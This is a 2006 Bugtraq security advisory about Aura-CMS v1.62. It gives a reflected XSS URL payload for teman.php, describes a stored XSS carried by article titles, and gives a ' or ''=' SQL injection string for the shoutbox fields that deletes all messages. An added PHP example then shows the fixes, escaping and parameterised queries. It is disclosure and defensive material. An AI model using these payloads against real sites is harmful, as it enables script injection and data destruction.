Date: Thu, 06 Jul 2006 21:23:23 +0700
From: "k07iX" <apem-zigzag@...kom.net>
To: bugtraq@...urityfocus.com
Subject: lintah_|adv|_01@...6>=========<[Aura-CMS v1.62]<===>[XSS
 vulnerable]&[bug]


by : iFX a.k.a inversFX
  _______________________________
[	apem-zigzag@...kom.net	]
[	inversfx@...oo.com	]
  -------------------------------
locate : Indonesia, Jakarta
--------------------------------
date   : 29/06/2006
--------------------------------
title  : XSS on `CMS Aura v1.62`
--------------------------------
Developer CMS : Arif Supriyanto - arif@....kliksini.com
   	        http://www.auracms.tk
                 http://www.semarang.tk
	        http://www.ayo.kliksini.com
  	        http://www.auracms.opensource-indonesia.com
--------------------------------


PoC :
--------------------------------------------------------------------

1.  in 'teman.php' we can see the code :

.....
echo "<p class=judul>Kirim ke Teman</p>
<p class=konten>Anda ingin memberitahu teman Anda tentang 
artikel ini yang berjudul
: <b>$judul_artikel</b>.";
.....

   	
	we found something here, that's variable $judul_artikel
	so we can xss from the url :


	1st ex:
	http://localhost/teman.php?judul_artikel=<script>alert("mati dah gwa!!!")</script>

	2nd ex:
	or we can send an article to admin whose title has the XSS code, so when anonymous is
	opening the index.php, the script runs.
---------------------------------------------------------------------

2.  we found something here that can delete all shoutbox messages.
	as usual we can shout anonymously with fake name, mail, pesan.
	here when I insert

name  = ' or ''='			<== old SQL injection code
mail  = test_string			<== you can fill it with free mail address
pesan = ' or ''='			<== old SQL injection code

then all messages on it are cleared amazingly....



----------------------------------------------------------------------
screen shot :
http://h1.ripway.com/lintah/adv/img/01-iFX-2006-AuraCMS-v1.62-XSS.bmp
origin :
http://h1.ripway.com/lintah/adv/txt/01-iFX-2006-AuraCMS-v1.62-XSS-Bug.txt
----------------------------------------------------------------------

sorry for my words in English, cuz I often REMED!!!
   					                           _________________
                                                            
       /Shout :|       |X|
-------------------------------------------------------------------------------------
|ECHO's kommunity & Staff, Kecoak kommunity, Jasakom 
kommunity, all hacker kommunity|
|$pecial to : cR45H3R, Dr.Pluto, he4rt_bre4ker, bius, 
||||||||.			    |
|Lintah{ iFX, BlueJaccker, Sin~X, Xploid, frezZe, 
Shock-3d, G4mMa, Big_Red_One }    |
-------------------------------------------------------------------------------------
							       |OK | Apply | Cancel |
							       ----------------------
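
Added example, not part of the original post and not AuraCMS code: the two fixes the findings above call for, output escaping for the title echoed by teman.php and bound parameters for the shoutbox fields. The advisory does not show the shoutbox query, so the `shoutbox` table, its columns, the function names and the in-memory SQLite database are assumptions made for illustration.

```php
<?php
// Added example; table, column and function names are hypothetical,
// and SQLite in memory stands in for the CMS database.

// 1. teman.php: escape the title before it is echoed into HTML.
//    Assumption: the value arrives as $_GET['judul_artikel'].
function render_title(string $judul_artikel): string
{
    $safe = htmlspecialchars($judul_artikel, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return "<p class=\"konten\">Kirim ke Teman: <b>{$safe}</b>.</p>";
}

// 2. Shoutbox: bind user input as parameters so quotes stay data, not SQL.
function add_shout(PDO $db, string $name, string $mail, string $pesan): void
{
    $stmt = $db->prepare('INSERT INTO shoutbox (name, mail, pesan) VALUES (?, ?, ?)');
    $stmt->execute([$name, $mail, $pesan]);
}

function count_shouts(PDO $db): int
{
    return (int) $db->query('SELECT COUNT(*) FROM shoutbox')->fetchColumn();
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE shoutbox (id INTEGER PRIMARY KEY, name TEXT, mail TEXT, pesan TEXT)');

// Constructed inputs: one ordinary shout, then the strings quoted in the advisory.
add_shout($db, 'alice', 'alice@example.com', 'hello');
add_shout($db, "' or ''='", 'test_string', "' or ''='");

// The earlier message is still present and the quote string is stored verbatim.
echo 'rows in shoutbox: ', count_shouts($db), "\n";

// The title from the advisory's first URL is rendered as inert text.
echo render_title('<script>alert("mati dah gwa!!!")</script>'), "\n";
```

The same `render_title` escaping applies wherever a stored article title is printed, which covers the second XSS case described for index.php.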